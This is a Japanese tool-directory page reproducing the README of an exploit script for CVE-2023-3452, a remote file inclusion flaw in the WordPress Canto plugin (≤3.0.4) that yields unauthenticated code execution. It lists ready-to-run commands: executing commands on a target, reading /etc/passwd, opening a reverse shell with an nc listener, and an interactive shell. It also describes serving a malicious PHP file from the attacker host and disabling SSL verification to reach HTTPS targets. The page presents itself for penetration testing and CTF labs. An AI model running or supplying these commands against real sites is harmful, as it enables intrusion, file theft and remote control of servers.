Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-3452---WordPress-Canto-Plugin-RCE — WordPress Cantoプラグイン向けCVE-2023-3452エクスプロイト(RCE)、HTTPS対応を含む | Kitploit
ツール/GitHubGitHub/alpastx/cve-2023-3452---wordpress-canto-plugin-rce
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHubalpastx/cve-2023-3452---wordpress-canto-plugin-rce

CVE-2023-3452---WordPress-Canto-Plugin-RCE

WordPress Cantoプラグイン向けCVE-2023-3452エクスプロイト(RCE)、HTTPS対応を含む

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
137ヶ月前未レビュー

CVE-2023-3452 - WordPress CantoプラグインRCE

WordPress Cantoプラグイン(≤ 3.0.4)のRFI脆弱性のエクスプロイト。HTTPSでも実際に動作します — 他の公開PoCはSSLで諦めていました。

クレジットは当然: このCVEは他の人が発見しました。私はHTTPSターゲットで壊れないバージョンを作っただけです。

脆弱性

CVECVE-2023-3452
EDB-ID51826
タイプリモートファイルインクルード(RFI)→未認証RCE
影響を受けるバージョンWordPress Cantoプラグイン < 3.0.5 (≤ 3.0.4)
公開者Leopoldo Angulo (leoanggal1) — 2024-02-27
場所/wp-content/plugins/canto/includes/lib/download.php
ベクターwp_abspathが検証なしでPHPファイルのインクルードに使用される — リモートからファイルをインクルードします。

なぜこれなのか?

このCVEのほとんどのエクスプロイトはSSL検証のためHTTPSで動作しません。このスクリプトは:

  • verify=Falseを使用してHTTPSターゲットで実際に動作するように
  • urllib3の警告スパムを抑制
  • HTTPとHTTPSの両方で同じように動作 — 別途設定は不要

必要条件

  • Python 3.6+
  • requests

インストール

pip install -r requirements.txt

または単に: pip install requests

使用法

python3 canto_exploit.py -t <TARGET_URL> -l <LHOST> -p <LPORT> [OPTIONS]

引数

オプション説明必須
-t, --targetターゲットWordPress URL (HTTPまたはHTTPS)はい
-l, --lhostあなたのIP — ターゲットがペイロードのためにこれに到達する必要がありますはい
-p, --lportペイロードサーバーのポート (デフォルト: 8888)いいえ
-c, --commandターゲットで実行するコマンドいいえ*
--revshellリバースシェルを起動いいえ
--shell-portリバースシェルのリスナーポート (デフォルト: 4444)いいえ
-i, --interactiveインタラクティブシェルモードいいえ
-v, --verbose詳細出力いいえ
--skip-check脆弱性チェックをスキップいいえ

* コマンドなし = 正常性確認として id; whoami; hostname を実行

例

単一コマンド:

python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 -c "id"

ファイルを読む:

python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 -c "cat /etc/passwd"

リバースシェル (最初に nc -lvnp 4444 を実行):

python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 --revshell --shell-port 4444

インタラクティブモード:

python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 -i

HTTPS CTFターゲット:

python3 canto_exploit.py -t https://10.129.1.136 -l 10.10.14.33 -p 8888 -c "id"

動作の仕組み

  1. チェック — /wp-content/plugins/canto/readme.txt にアクセスし、バージョンを解析 (≤ 3.0.4 = 脆弱)
  2. ペイロード — system() 経由でコマンドを実行する偽の wp-admin/admin.php を書き込む
  3. サーブ — ローカルHTTPサーバーを起動し、ターゲットがファイルを取得できるようにする
  4. トリガー — wp_abspath=http://LHOST:LPORT を含む download.php をリクエストし、リモートPHPをインクルードさせる
  5. 実行 — 相手のサーバーがコードを実行し、出力を取得する

ネットワークに関する注意事項

  • ターゲットは LHOST:LPORT であなたのマシンに到達できる必要があります (HTB/ラボの場合、それはあなたのVPN IPです)
  • ファイアウォールはペイロードポート (-p) のインバウンドを許可する必要があります

免責事項

許可されたテストおよび教育目的のみに使用してください。許可されたシステムのみにアクセスしてください。それ以外は違法です。

ライセンス

MIT

ツールをダウンロード